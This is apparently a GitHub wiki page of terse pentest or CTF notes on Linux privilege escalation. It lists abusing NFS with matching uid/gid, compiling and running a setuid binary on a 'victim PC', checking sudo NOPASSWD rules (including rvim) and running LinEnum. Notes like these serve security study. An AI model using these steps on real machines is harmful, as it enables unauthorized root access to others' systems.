-
Notifications
You must be signed in to change notification settings - Fork 14
Linux escalate steps
lethanhtung01011980 edited this page Jan 7, 2020
·
19 revisions
- From nobody to user
- From User to root
Methods
- Can attack using user with same uid and gid as with victim uer in victim PC
- Via NFS root_squash,no_all_squash
To use setuid
- Sample code https://github.com/lethanhtung01011980/Notes/blob/master/runAsOtherLinuxUser.c
- su - frank
- vim runAsOtherLinuxUser.c
- gcc runAsOtherLinuxUser.c -o runAsOtherLinuxUser
- chmod u+s runAsOtherLinuxUser
- In victim PC, ./runAsOtherLinuxUser
To if can run sudo with "NOPASSWD" aka as root:
sudo -l
User frank may run the following commands on this host:
(frank) NOPASSWD: /opt/logreader/logreader.sh
(adm) NOPASSWD: /usr/bin/rvim /var/www/html/jailuser/dev/jail.c
If see "Vim: Warning: Output is not to a terminal"
- Type
ZQ
Or run LinEnum